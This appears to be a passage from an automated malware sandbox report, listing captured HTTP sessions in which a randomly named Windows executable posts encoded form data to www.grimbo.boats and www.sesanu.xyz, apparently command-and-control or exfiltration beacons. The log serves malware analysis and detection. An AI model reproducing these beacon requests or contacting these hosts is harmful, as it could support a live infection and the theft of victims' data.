                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.450017104.21.18.171802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:36.354372978 CET732OUTPOST /mjs1/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.grimbo.boats
                                                                            Origin: http://www.grimbo.boats
                                                                            Referer: http://www.grimbo.boats/mjs1/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 205
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 4c 58 4a 66 69 58 6e 52 53 39 43 48 76 71 5a 69 6a 43 4d 72 77 5a 63 57 30 45 71 6b 6c 78 52 52 46 30 78 2b 4c 4e 43 4f 47 32 56 39 72 73 75 45 6c 6e 2f 50 33 51 66 6f 58 76 66 57 72 6e 65 4d 31 39 50 38 72 75 39 42 45 52 6f 32 65 36 64 58 68 49 38 71 78 56 4d 45 75 4d 39 43 36 4c 46 35 44 61 6b 34 70 63 57 37 5a 50 39 68 41 4a 77 71 44 6c 30 67 65 63 4e 76 6f 6b 63 30 43 59 6d 6c 50 4e 57 77 56 30 70 72 42 38 61 6d 59 51 36 53 6c 32 57 6c 79 4b 5a 53 72 71 67 4a 53 6f 73 43 6d 38 65 46 35 56 46 33 66 79 6c 65 4f 48 39 72 37 54 58 39 64 39 2f 30 48 49 4a 78 66 57 44 58 74 51 3d 3d
                                                                            Data Ascii: idTDev6P=LXJfiXnRS9CHvqZijCMrwZcW0EqklxRRF0x+LNCOG2V9rsuEln/P3QfoXvfWrneM19P8ru9BERo2e6dXhI8qxVMEuM9C6LF5Dak4pcW7ZP9hAJwqDl0gecNvokc0CYmlPNWwV0prB8amYQ6Sl2WlyKZSrqgJSosCm8eF5VF3fyleOH9r7TX9d9/0HIJxfWDXtQ==
                                                                            Jan 13, 2025 10:20:36.981306076 CET1091INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 13 Jan 2025 09:20:36 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qaLspminxDITApjpX%2F7FjrDf5bDfL7USOzvER0IpMma6CzvMNXwKVocNYucN8uqc4MWx6NuATd3NVUU%2BHjLdDIwX48%2BzG%2B%2Fpk5l%2B7nrDkW1YSrg2xSbzmkIgbiY%2FCWOGDxK"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90144fb59f395e62-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=732&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.450018104.21.18.171802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:38.907929897 CET752OUTPOST /mjs1/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.grimbo.boats
                                                                            Origin: http://www.grimbo.boats
                                                                            Referer: http://www.grimbo.boats/mjs1/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 225
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 4c 58 4a 66 69 58 6e 52 53 39 43 48 75 4c 70 69 76 44 4d 72 34 5a 63 56 6f 55 71 6b 38 42 52 56 46 30 31 2b 4c 50 79 65 47 45 78 39 6f 4e 65 45 6b 6d 2f 50 32 51 66 6f 64 50 66 54 6d 48 65 4c 31 39 44 61 72 71 31 42 45 52 73 32 65 37 4e 58 68 2f 51 74 2b 6c 4d 47 37 63 39 41 2b 4c 46 35 44 61 6b 34 70 63 44 65 5a 50 6c 68 41 35 67 71 43 42 67 76 41 73 4e 6f 76 6b 63 30 54 6f 6d 62 50 4e 57 65 56 31 46 53 42 36 65 6d 59 53 79 53 6c 6e 57 6b 39 4b 5a 75 6c 4b 68 70 61 49 70 55 68 5a 54 39 32 44 64 7a 64 78 64 75 50 42 77 78 71 69 32 71 50 39 62 48 61 50 41 46 53 56 2b 65 32 5a 43 43 6e 42 72 34 47 66 4a 74 62 67 4e 51 65 4d 4b 53 41 79 55 3d
                                                                            Data Ascii: idTDev6P=LXJfiXnRS9CHuLpivDMr4ZcVoUqk8BRVF01+LPyeGEx9oNeEkm/P2QfodPfTmHeL19Darq1BERs2e7NXh/Qt+lMG7c9A+LF5Dak4pcDeZPlhA5gqCBgvAsNovkc0TombPNWeV1FSB6emYSySlnWk9KZulKhpaIpUhZT92DdzdxduPBwxqi2qP9bHaPAFSV+e2ZCCnBr4GfJtbgNQeMKSAyU=
                                                                            Jan 13, 2025 10:20:39.552984953 CET1092INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 13 Jan 2025 09:20:39 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jc7qfFfZ7I3FRias3CFKpfZZp1SY8PwblZQ%2BjN627zoAqxQjA15%2F0o3U8WWrCiqhsYoqMxu7r88CJ4GwW3QyOOlbNO42TjHFpKY1PA%2FiEubEAiFjh%2FFIIN98f0HnP25Zr%2FDE"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90144fc5a98e432c-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1676&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=752&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.450019104.21.18.171802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:41.455413103 CET10834OUTPOST /mjs1/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.grimbo.boats
                                                                            Origin: http://www.grimbo.boats
                                                                            Referer: http://www.grimbo.boats/mjs1/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 10305
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 4c 58 4a 66 69 58 6e 52 53 39 43 48 75 4c 70 69 76 44 4d 72 34 5a 63 56 6f 55 71 6b 38 42 52 56 46 30 31 2b 4c 50 79 65 47 45 35 39 6f 37 4b 45 6d 42 54 50 78 51 66 6f 65 50 66 53 6d 48 66 4f 31 2b 7a 65 72 71 78 37 45 54 6b 32 65 5a 56 58 70 74 6f 74 6c 31 4d 47 35 63 39 4e 36 4c 46 57 44 63 45 38 70 63 54 65 5a 50 6c 68 41 37 6f 71 42 56 30 76 43 73 4e 76 6f 6b 63 77 43 59 6d 67 50 4d 2b 6f 56 31 78 64 42 4b 2b 6d 59 79 69 53 6e 56 4f 6b 77 4b 5a 57 6d 4b 68 4c 61 4a 55 4b 68 5a 6d 45 32 44 42 5a 64 32 39 75 4d 6c 78 41 31 6d 2b 32 57 38 48 46 46 50 45 32 56 54 2b 63 79 75 61 68 68 6b 33 2f 57 66 4e 43 65 77 4e 64 5a 70 57 58 61 55 78 67 61 30 30 7a 74 48 47 48 4e 32 68 6a 79 44 32 76 68 6c 4f 70 69 58 5a 70 35 2b 2b 51 54 44 71 52 38 53 67 72 69 6e 55 67 34 34 5a 70 71 66 36 2f 42 67 62 36 6d 63 54 46 59 69 4e 58 4e 30 65 79 56 48 68 55 6b 43 48 4e 35 64 73 78 67 43 51 47 65 51 39 42 50 79 4d 41 4f 57 4c 30 35 4d 53 54 36 38 7a 33 32 64 7a 53 63 37 30 4f 36 68 58 70 4d [TRUNCATED]
                                                                            Data Ascii: idTDev6P=LXJfiXnRS9CHuLpivDMr4ZcVoUqk8BRVF01+LPyeGE59o7KEmBTPxQfoePfSmHfO1+zerqx7ETk2eZVXptotl1MG5c9N6LFWDcE8pcTeZPlhA7oqBV0vCsNvokcwCYmgPM+oV1xdBK+mYyiSnVOkwKZWmKhLaJUKhZmE2DBZd29uMlxA1m+2W8HFFPE2VT+cyuahhk3/WfNCewNdZpWXaUxga00ztHGHN2hjyD2vhlOpiXZp5++QTDqR8SgrinUg44Zpqf6/Bgb6mcTFYiNXN0eyVHhUkCHN5dsxgCQGeQ9BPyMAOWL05MST68z32dzSc70O6hXpMHNoq4h6ciL8E586rYTheBTgXYYTHNVF9ZTP3S1j4mTG+8hhCPTXBDHqjMxZelzYFQgCOwXpkGLNKVkIzjz/Ytcus+BYAp6q7mvIOEc3CdaqdXJNkuJem08b4i6q5z5QYGJ1Ap/Vcn7BVYUkD6jc3Jbt/+DD+mJNvh8+TNVbU8AYyNOTlMqFohfqEzzzzS38/7v79uvXEnWwOEJNitIbNpN5QtOse0eG3xZ2Z25bvyPq3Am75GBSaq2xAXBIJOEf4ci2SlbnHuY6v2oJo9yPeMHfA0m+Nzpx0a/bp1+RNQ+NR4sztyHSweXkQumJ5gQUJH4aEbLX6lIkFk3F+WU7UFnznk/4hgJyw8Q/NM1w55kFtShf2/XYQcPUAeu4FjUHSrDksrO0G2MQuDUMqLqJrak5Fe4oulHvT30kxjLh0a0UNTniEDSqz0o4UP/yhnZPP45o9F9ZOovfuQBsdhIrfV+0VEfp7yAuqXbPo9Pr9mAzU4Hxf3CHvaSzJz5UsHZ/8bu96ne6Ysn6BI7xH5waNmyyydjbCVS//mI36e4tz9U0hz6wJY5vi1zWQckcrdalSYtS6xdslZDaAQsQ/EoUq5XsaPne4eMj/DNT506g+WGV+m0nGeGQqMPxX1J4j1n+0x3UTQ7NXy8mVpvJlzsVA6h4rA2kMTNFEuz [TRUNCATED]
                                                                            Jan 13, 2025 10:20:42.086296082 CET1093INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 13 Jan 2025 09:20:42 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qKCMPbw1omOcB84Tpt9%2BK242kenX68YxcKBKe%2B3VcggY1ULWDYxIGueMrvJNsawQ1TJ5rYIqsRGVtPgjJjSd%2Fwwy7YYoYau0wU63SEhzOfdMhboa9KleSHSDOyVZzhZTYv%2BN"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90144fd58ee18c5f-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1940&min_rtt=1940&rtt_var=970&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10834&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.450020104.21.18.171802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:44.006392002 CET466OUTGET /mjs1/?z2=LHT8eHbp3J&idTDev6P=GVh/hhHQVOm9lJhlnTwGtMkA4ymI5xMQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4xM/x/d5q69NU5cNgbKFIutrK5EtJTwwV9w= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.grimbo.boats
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Jan 13, 2025 10:20:44.644236088 CET1101INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 13 Jan 2025 09:20:44 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzI32YBuEIg8J1ALTg3gm%2BAJHCXDPJgNTBKHKv4kLbAqD%2FU9tTbi1Bn0k5kBZusOSD%2F6cDuYl1IlJm7%2BY0r6OZHylCHyOv8jmHFuU87KbdKbY1escpq4hTKNbcvDXmIWR5Nq"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90144fe58aac4319-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=466&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.450021199.192.21.169802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:49.702526093 CET726OUTPOST /rf25/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sesanu.xyz
                                                                            Origin: http://www.sesanu.xyz
                                                                            Referer: http://www.sesanu.xyz/rf25/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 205
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 32 49 58 32 44 43 54 4c 63 33 6a 47 39 44 64 74 45 6c 62 49 70 30 78 63 56 48 6c 45 30 73 32 6c 52 51 64 31 47 77 74 43 4d 39 30 76 44 55 55 45 54 73 6f 6c 59 63 59 79 50 52 56 32 69 79 32 36 34 58 2f 73 51 76 4b 37 48 56 6d 50 41 46 51 73 4a 65 30 73 75 43 52 46 38 78 63 72 36 59 45 4e 64 71 33 2f 6b 49 39 36 68 75 50 45 66 6f 54 58 55 44 68 61 61 77 49 31 71 53 75 6b 70 4f 56 4c 46 44 69 45 69 41 42 7a 68 30 50 7a 64 77 4e 75 4f 2f 55 44 6d 58 4e 4c 35 6c 51 72 6f 39 34 67 32 78 4a 47 59 42 43 66 58 69 42 71 57 62 38 38 49 56 72 30 75 74 67 57 56 4d 74 6d 42 4d 49 62 56 51 3d 3d
                                                                            Data Ascii: idTDev6P=2IX2DCTLc3jG9DdtElbIp0xcVHlE0s2lRQd1GwtCM90vDUUETsolYcYyPRV2iy264X/sQvK7HVmPAFQsJe0suCRF8xcr6YENdq3/kI96huPEfoTXUDhaawI1qSukpOVLFDiEiABzh0PzdwNuO/UDmXNL5lQro94g2xJGYBCfXiBqWb88IVr0utgWVMtmBMIbVQ==
                                                                            Jan 13, 2025 10:20:50.329318047 CET918INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 13 Jan 2025 09:20:50 GMT
                                                                            Server: Apache
                                                                            Content-Length: 774
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.450022199.192.21.169802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:52.251660109 CET746OUTPOST /rf25/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sesanu.xyz
                                                                            Origin: http://www.sesanu.xyz
                                                                            Referer: http://www.sesanu.xyz/rf25/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 225
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 32 49 58 32 44 43 54 4c 63 33 6a 47 2f 67 46 74 47 47 6a 49 2b 45 78 54 66 6e 6c 45 2b 4d 32 68 52 51 42 31 47 78 70 53 4d 50 67 76 45 30 45 45 53 70 55 6c 49 4d 59 79 61 68 56 7a 38 43 32 39 34 58 37 6b 51 75 32 37 48 56 43 50 41 48 49 73 4a 70 67 72 6f 43 52 4c 70 68 63 70 6e 49 45 4e 64 71 33 2f 6b 49 70 63 68 71 6a 45 63 59 6a 58 57 68 4a 62 53 51 49 32 39 69 75 6b 74 4f 56 51 46 44 6a 58 69 42 63 6f 68 79 4c 7a 64 31 78 75 4f 72 41 41 7a 48 4e 4a 68 46 52 75 67 4d 64 4e 77 43 67 31 52 43 6d 4c 58 41 4d 4c 54 64 78 6d 5a 6b 4b 6a 38 74 45 6c 49 4c 6b 53 4d 50 31 53 4f 66 4c 43 48 58 68 34 45 51 57 52 48 75 4b 4d 53 46 51 52 68 4f 77 3d
                                                                            Data Ascii: idTDev6P=2IX2DCTLc3jG/gFtGGjI+ExTfnlE+M2hRQB1GxpSMPgvE0EESpUlIMYyahVz8C294X7kQu27HVCPAHIsJpgroCRLphcpnIENdq3/kIpchqjEcYjXWhJbSQI29iuktOVQFDjXiBcohyLzd1xuOrAAzHNJhFRugMdNwCg1RCmLXAMLTdxmZkKj8tElILkSMP1SOfLCHXh4EQWRHuKMSFQRhOw=
                                                                            Jan 13, 2025 10:20:52.838083029 CET918INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 13 Jan 2025 09:20:52 GMT
                                                                            Server: Apache
                                                                            Content-Length: 774
                                                                            Connection: close
                                                                            Content-Type: text/html
